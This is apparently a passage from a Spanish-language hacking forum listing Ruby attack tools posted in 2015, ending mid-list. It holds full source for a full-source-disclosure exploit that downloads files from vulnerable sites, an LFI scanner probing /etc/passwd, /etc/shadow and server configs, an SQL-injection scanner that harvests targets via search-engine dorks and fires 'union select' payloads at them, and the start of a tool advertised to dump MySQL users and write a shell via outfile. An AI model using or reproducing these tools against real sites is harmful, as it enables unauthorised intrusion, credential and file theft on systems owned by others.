|
51
|
Programación / Scripting / [Ruby] FSD Exploit Manager 0.3
|
en: 4 Septiembre 2015, 23:01 pm
|
Un simple script en Ruby que sirve como exploit para la vulnerabilidad Full Source Discloure. El codigo : #!usr/bin/ruby #FSD Exploit Manager 0.3 require "open-uri" require "net/http" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def uso print "\n[+] Sintax : ruby locateip.rb <target>\n" end def head print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" exit(1) end def installer if not Dir.exists?("logs") Dir.mkdir "logs" end Dir.chdir("logs") end def download(file,name) File.open(name, "wb") do |saved_file| open(file, "rb") do |read_file| saved_file.write(read_file.read) end end end def scan_fsd(target) print "\n[+] Scanning ...\n\n" path = File.basename(URI(target).path) code = toma(target+path) if code=~/header\((.*)Content-Disposition: attachment;/ print "[+] Vulnerable !\n" while(1) print "\n[+] Insert Filename : " filename = STDIN.gets.chomp if filename=="exit" copyright() else download(target+filename,filename) print "\n[+] Downloaded !\n" end end else print "[-] Not vulnerable\n" end end target = ARGV[0] installer() head() if !target uso() else scan_fsd(target) end copyright() #The End ?
Eso es todo.
|
|
|
52
|
Programación / Scripting / [Ruby] LFI Scanner 0.3
|
en: 21 Agosto 2015, 23:37 pm
|
Un simple script en Ruby para scannear la vulnerabilidad LFI en una pagina. Version consola : #!usr/bin/ruby #LFI Scanner 0.3 #(C) Doddy Hackman 2015 require "open-uri" require "net/http" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def uso print "\n[+] Sintax : ruby lfi.rb <page>\n" end def head print "\n\n-- == LFI Scanner 0.3 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" exit(1) end def scan(web) files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] print "\n[+] Testing the vulnerability LFI...\n\n" code = toma(web+"'") if code=~/No such file or directory in <b>(.*)<\/b> on line/ fpd = $1 print "[+] LFI Detected\n\n" print "[Full Path Discloure]: "+fpd+"\n" print "\n[+] Fuzzing Files\n\n" files.each do |file| code = toma(web+file) if not code=~/No such file or directory in/ print "[Link] : "+web+file+"\n" end end print "\n[+] Finish\n" copyright() else print "[-] Not Vulnerable to LFI\n\n" end end # page = ARGV[0] head() if !page uso() else scan(page) end copyright() #The End ?
Version Tk : #!usr/bin/ruby #LFI Scanner 0.3 #(C) Doddy Hackman 2015 require "tk" require "net/http" require "open-uri" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end # window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" } window['geometry'] = '300x300-20+10' TkLabel.new(window) do background "black" foreground "cyan" text " Target : " place('relx'=>"0.1",'rely'=>"0.1") end web= TkEntry.new(window){ background "black" foreground "cyan" width 25 place('relx'=>0.3,'rely'=>0.1) } TkLabel.new(window) do background "black" foreground "cyan" text "Console" place('relx'=>0.4,'rely'=>0.2) end console =TkText.new(window) do background "black" foreground "cyan" width 30 height 10 place('relx'=>0.1,'rely'=>0.3) end TkButton.new(window) do text "Search" background "black" foreground "cyan" width 17 activebackground "cyan" highlightbackground "cyan" command proc{ web = web.value.to_s files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] console.insert("end", "[+] Testing the vulnerability LFI...\n\n") code = toma(web+"'") if code=~/No such file or directory in <b>(.*)<\/b> on line/ fpd = $1 console.insert("end","[+] LFI Detected\n\n") console.insert("end","[Full Path Discloure]: "+fpd+"\n") console.insert("end","\n[+] Fuzzing Files\n\n") files.each do |file| code = toma(web+file) if not code=~/No such file or directory in/ console.insert("end","[Link] : "+web+file+"\n") end end console.insert("end","\n[+] Finish") else console.insert("end","[-] Not Vulnerable to LFI") end } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen : Eso es todo.
|
|
|
53
|
Programación / Scripting / [Ruby] SQLI Scanner 0.4
|
en: 7 Agosto 2015, 22:25 pm
|
Un simple script en Ruby para buscar paginas vulnerables a SQLI usando Google o Bing. Version consola : #!usr/bin/ruby #SQLI Scanner 0.4 #(C) Doddy Hackman 2015 require "open-uri" require "net/http" require "openssl" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def toma_ssl(web) uri = URI.parse(web) nave = Net::HTTP.new(uri.host, uri.port) nave.use_ssl = true nave.verify_mode = OpenSSL::SSL::VERIFY_NONE return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end def cortar(pages) final = "" finales = [] pages.flatten.each do |page| if page=~/(.*)=(.*)/ parte1 = $1 parte2 = $2 final = parte1 + "=" finales.push(final) end end return finales end def google(dork,pages) links = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s) paginas = code.scan(/(?<="r"><. href=")(.+?)"/) paginas.flatten.each do |pagina| partes = pagina if partes=~/url\?q=(.*)&sa/ parte = $1 link = URI::decode(parte) links.push(link) end end end links = links.uniq return links end def google_recursive(dork,pages) dork = dork.sub(/ /,"+") contador = 0 guardo = [] for i in ("1"..pages) contador+=10 url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s code = toma_ssl(url) links = URI::extract(code) links.each do |link| if link=~/cache:(.*?):(.*?)\+/ link_final = "http://"+$2 link_final = URI::decode(link_final) guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def bing(dork,pages) guardo = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s) links = code.scan(/<h2><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end links = code.scan(/<h3><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def uso print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n" print "-search_bing : Find in Bing\n" print "-search_google : Find in Google\n" print "-scan_bing : Find SQLI in Bing\n" print "-scan_google : Find SQLI in Google\n" print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n" end def head print "\n\n-- == SQLI Scanner 0.4 == --\n\n" end def copyright print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n" end opcion = ARGV[0] dork = ARGV[1] pages = ARGV[2] head() if !opcion or !dork or !pages uso() else if opcion=="-search_bing" print "\n[+] Searching in Bing ...\n\n" links = bing(dork,pages) print "[+] Pages Count : "+links.count.to_s+"\n\n" if links.count.to_s=="0" print "[-] Links not found\n" end links.flatten.each do |link| print "[+] Link : "+link+"\n" end print "\n[+] Finished\n" elsif opcion=="-search_google" print "\n[+] Searching in Google ...\n\n" links = google(dork,pages) if links.count.to_s=="0" print "[+] Searching in Google again ...\n\n" links = google_recursive(dork,pages) end print "[+] Pages Count : "+links.count.to_s if links.count.to_s=="0" print "[-] Links not found" end links.flatten.each do |link| print "[+] Link : "+link+"\n" end print "\n[+] Finished\n" elsif opcion=="-scan_bing" print "\n[+] Searching in Bing ...\n\n" links = cortar(bing(dork,pages)) print "[+] Pages Count : "+links.count.to_s+"\n\n" if links.count.to_s=="0" print "[-] Links not found\n" end links.flatten.each do |link| print "[+] Link : "+link begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ print " [OK]\n\a\a" else print " [FAIL]\n" end rescue print " [FAIL]\n" end end print "\n[+] Finished\n" elsif opcion=="-scan_google" print "\n[+] Searching in Google ...\n\n" links = cortar(google(dork,pages)) if links.count.to_s=="0" print "[+] Searching in Google again ...\n\n" links = cortar(google_recursive(dork,pages)) end print "[+] Pages Count : "+links.count.to_s+"\n\n" if links.count.to_s=="0" print "[-] Links not found" end links.flatten.each do |link| print "[+] Link : "+link begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ print " [OK]\n\a\a" else print " [FAIL]\n" end rescue print " [FAIL]\n" end end print "\n[+] Finished\n" else print "[-] Bad Option" end end copyright() #The End ?
Version Tk para Google : #!usr/bin/ruby #SQLI Scanner 0.4 #(C) Doddy Hackman 2015 #Scan Google Tk require "tk" require "open-uri" require "net/http" require "openssl" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def toma_ssl(web) uri = URI.parse(web) nave = Net::HTTP.new(uri.host, uri.port) nave.use_ssl = true nave.verify_mode = OpenSSL::SSL::VERIFY_NONE return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end def cortar(pages) final = "" finales = [] pages.flatten.each do |page| if page=~/(.*)=(.*)/ parte1 = $1 parte2 = $2 final = parte1 + "=" finales.push(final) end end return finales end def google(dork,pages) links = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s) paginas = code.scan(/(?<="r"><. href=")(.+?)"/) paginas.flatten.each do |pagina| partes = pagina if partes=~/url\?q=(.*)&sa/ parte = $1 link = URI::decode(parte) links.push(link) end end end links = links.uniq return links end def google_recursive(dork,pages) dork = dork.sub(/ /,"+") contador = 0 guardo = [] for i in ("1"..pages) contador+=10 url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s code = toma_ssl(url) links = URI::extract(code) links.each do |link| if link=~/cache:(.*?):(.*?)\+/ link_final = "http://"+$2 link_final = URI::decode(link_final) guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def bing(dork,pages) guardo = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s) links = code.scan(/<h2><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end links = code.scan(/<h3><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end end guardo = guardo.uniq return guardo end # window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" } window['geometry'] = '300x320-20+10' TkLabel.new(window) do background "black" foreground "green" text " Dork : " place('relx'=>"0.1",'rely'=>"0.1") end dork = TkEntry.new(window){ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.1) } TkLabel.new(window) do background "black" foreground "green" text " Pages : " place('relx'=>"0.1",'rely'=>"0.2") end pages = TkEntry.new(window){ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.2) } TkLabel.new(window) do background "black" foreground "green" text "Console" place('relx'=>0.4,'rely'=>0.3) end console =TkText.new(window) do background "black" foreground "green" width 30 height 9 place('relx'=>0.1,'rely'=>0.4) end TkButton.new(window) do text "Search" background "black" foreground "green" width 17 activebackground "green" highlightbackground "green" command proc{ dork = dork.value.to_s pages = pages.value.to_s console.insert("end", "[+] Searching in Google ...\n\n") links = cortar(google(dork,pages)) if links.count.to_s=="0" console.insert("end", "[+] Searching in Google again ...\n\n") links = cortar(google_recursive(dork,pages)) end console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n") if links.count.to_s=="0" console.insert("end", "[-] Links not found") end links.flatten.each do |link| console.insert("end", "[+] Link : "+link) begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ console.insert("end"," [OK]\n\a\a") else console.insert("end"," [FAIL]\n") end rescue console.insert("end", " [FAIL]\n") end end console.insert("end", "\n[+] Finished") } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen : Version Tk para Bing : #!usr/bin/ruby #SQLI Scanner 0.4 #(C) Doddy Hackman 2015 #Scan Bing Tk require "tk" require "open-uri" require "net/http" require "openssl" # Functions def toma(web) begin return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read rescue return "Error" end end def toma_ssl(web) uri = URI.parse(web) nave = Net::HTTP.new(uri.host, uri.port) nave.use_ssl = true nave.verify_mode = OpenSSL::SSL::VERIFY_NONE return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body end def tomar(web,arg) begin headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"} uri = URI(web) http = Net::HTTP.new(uri.host, uri.port) return http.post(uri.path,arg, headers).body rescue return "Error" end end def cortar(pages) final = "" finales = [] pages.flatten.each do |page| if page=~/(.*)=(.*)/ parte1 = $1 parte2 = $2 final = parte1 + "=" finales.push(final) end end return finales end def google(dork,pages) links = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s) paginas = code.scan(/(?<="r"><. href=")(.+?)"/) paginas.flatten.each do |pagina| partes = pagina if partes=~/url\?q=(.*)&sa/ parte = $1 link = URI::decode(parte) links.push(link) end end end links = links.uniq return links end def google_recursive(dork,pages) dork = dork.sub(/ /,"+") contador = 0 guardo = [] for i in ("1"..pages) contador+=10 url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s code = toma_ssl(url) links = URI::extract(code) links.each do |link| if link=~/cache:(.*?):(.*?)\+/ link_final = "http://"+$2 link_final = URI::decode(link_final) guardo.push(link_final) end end end guardo = guardo.uniq return guardo end def bing(dork,pages) guardo = [] dork = dork.sub(/ /,"+") contador = 0 for i in ("1"..pages) contador+=10 code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s) links = code.scan(/<h2><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end links = code.scan(/<h3><a href="(.*?)" h/) links.flatten.each do |link| link_final = URI::decode(link) if not link_final=~/http:\/\/778802\.r\.msn\.com\// guardo.push(link_final) end end end guardo = guardo.uniq return guardo end # window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" } window['geometry'] = '300x320-20+10' TkLabel.new(window) do background "black" foreground "green" text " Dork : " place('relx'=>"0.1",'rely'=>"0.1") end dork = TkEntry.new(window){ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.1) } TkLabel.new(window) do background "black" foreground "green" text " Pages : " place('relx'=>"0.1",'rely'=>"0.2") end pages = TkEntry.new(window){ background "black" foreground "green" width 25 place('relx'=>0.3,'rely'=>0.2) } TkLabel.new(window) do background "black" foreground "green" text "Console" place('relx'=>0.4,'rely'=>0.3) end console =TkText.new(window) do background "black" foreground "green" width 30 height 9 place('relx'=>0.1,'rely'=>0.4) end TkButton.new(window) do text "Search" background "black" foreground "green" width 17 activebackground "green" highlightbackground "green" command proc{ dork = dork.value.to_s pages = pages.value.to_s console.insert("end", "[+] Searching in Bing ...\n\n") links = cortar(bing(dork,pages)) console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n") if links.count.to_s=="0" console.insert("end","[-] Links not found\n") end links.flatten.each do |link| console.insert("end", "[+] Link : "+link) begin url = toma(link + "-1+union+select+1--") if url=~/The used SELECT statements have a different number of columns/ console.insert("end"," [OK]\n\a\a") else console.insert("end", " [FAIL]\n") end rescue console.insert("end"," [FAIL]\n") end end console.insert("end", "\n[+] Finished") } place('relx'=>0.3,'rely'=>0.9) end Tk.mainloop #The End ?
Una imagen : Eso es todo.
|
|
|
54
|
Programación / Scripting / [Ruby] K0bra 0.5
|
en: 24 Julio 2015, 18:12 pm
|
Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina. El script tiene las siguientes opciones : - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
El codigo : #!usr/bin/ruby #K0bra 0.5 #(C) Doddy Hackman 2015 require "net/http" require "open-uri" $files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.